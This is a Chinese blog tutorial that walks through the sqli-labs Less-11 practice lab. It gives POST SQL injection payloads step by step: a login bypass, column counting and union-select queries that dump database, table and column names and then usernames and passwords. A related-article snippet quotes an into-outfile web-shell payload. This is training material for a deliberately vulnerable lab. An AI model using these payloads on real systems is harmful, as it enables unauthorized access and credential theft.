sqli-labs-less-11 POST传递

最新推荐文章于 2024-08-06 00:06:14 发布
原创 最新推荐文章于 2024-08-06 00:06:14 发布 · 318 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #post #安全漏洞 #web

本文详细介绍了SQL注入攻击的原理和步骤,通过使用Burp Suite和HackBar工具进行POST数据注入,展示了如何判断注入点、确定字段个数、查询数据库信息等。通过联合查询获取了数据库名、表名、字段名以及数据,揭示了SQL注入的危害及其检测防范的重要性。

Less-11 post传递

Less-11至less-20为post传递,post注入是通过对输入框进行传参,可以被带入数据库进行的查询
在这里插入图片描述

注入的两个条件:
1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询

首先我们用burp-suite进行抓包,配合hackbar进行注入
抓包,配置好burp-suite代理,
在这里插入图片描述

这里可以看到post传参的过程,将其复制,使用harkbar中的post data,开始注入
在这里插入图片描述

**

判断注入点

**
uname=’ or 1=1# &passwd=&submit=Submit 登录成功,判断这里为单引号闭合
(–+注释在URL中适用,在post传递中我们采用#进行注释)
在这里插入图片描述

判断字段个数,用于后面确定显示位:
uname=’ order by 3# &passwd=&submit=Submit 返回错误:
在这里插入图片描述

uname=’ order by 2# &passwd=&submit=Submit 无回显,确定字段为2

得到显示位:
uname=’ union select 1,2# &passwd=&submit=Submit
在这里插入图片描述

**

使用union联合查询当前数据库:

**
uname=’ union select 1,database()# &passwd=&submit=Submit
在这里插入图片描述

查询所有数据库(使用group_concat)

uname=’ union select 1,(select group_concat(schema_name) from information_schema.schemata )# &passwd=&submit=Submit
在这里插入图片描述

查询security库中的表:

uname=’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )# &passwd=&submit=Submit
在这里插入图片描述

查询users表中的字段:

uname=’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)# &passwd=&submit=Submit
在这里插入图片描述

查询users表中username字段的信息:

uname=’ union select 1,(select group_concat(username) from security.users)#&passwd=&submit=Submit
在这里插入图片描述

查询password字段的信息:

uname=’ union select 1,(select group_concat(password) from security.users)#&passwd=&submit=Submit在这里插入图片描述

将username和password连接后再输出:
uname=’ union select 1,(select group_concat(concat_ws(’-’,username,password)) from security.users)#&passwd=&submit=Submit
在这里插入图片描述

未完待续。。。

sqli-labs less-11 & less-12
water0diamond的博客
03-17 1073
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
2025.1.16——四、get_post 传参方式
最新发布
2402_87387800的博客
01-17 631
这道题很简单,用来了解get传参post传参的。
2021-11-11-get、posthackbar的使用
m0_54628962的博客
11-11 6209
2021/11/11攻防世界,bugku get/post 1.攻防世界 get_post 打开网页 get传参方法:在url(web地址)后添加/?后加变量名,每个变量名由?隔开 即 post传参方法: 1.在火狐浏览器上安装hackbar插件,浏览器右上角添加组件中搜索hackbar组件添加即可 2.在需要post传参的网页,Ctrl+Shift+k打开web控制台,点开hackbar,在url里输入当前网页网址,选择post data,在下方出现文本框中输入所需传入参数即可 点击Execute
sqli-labs less-11
爱党人士
06-15 894
1-10就是get,这个是post,会post就肯定会get的啦。 实验环境: firefox hackbar(这个是另一个版本,因为最多人用的那个版本要收费了) less 11: 随便输点东西 url栏没有什么变化, 肯定是post,用hackbar。 快速查看元素技巧: uname和passwd(这个在username右边的编辑框右键查看元素即可看到) 不出所料, 下面就是要对其进行判...
Sqli-labsLess-11Less-12
→_→
04-02 1930
Less-11 POST - 基于错误的- 单引号- 字符型 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post类型的,那么post与ge...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2018
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 990
一丢丢Sqli-labs小练习
精选资源
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1213
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 758
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库中表名。
sqli-labs (less-11)
kukudeshuo的博客
03-09 3754
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs ————less -11POST注入)
Fly_鹏程万里
05-11 4466
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
less-11】基于SQLIPOST字符型SQL注入
未名编程
07-17 764
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLIPOST字符型SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POSTSQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
sqli-labs Less-11,12
2202_75317918的博客
05-21 847
sqli-labs Less-11,12
SQLi-LABSLess -11 注入思路以及过程
m0_52513952的博客
02-22 3334
less 11sqli-labs 的第一道 POST 型注入题,因此,我们不能再用之前 GET 型注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
SQL注入实例(sqli-labs/less-11
Thewei666的博客
08-06 428
【代码】SQL注入实例(sqli-labs/less-11
SQLI-LABS Less-11Less-12
Web学习之路
03-22 389
联合注入
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12,sqlilabs less12
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值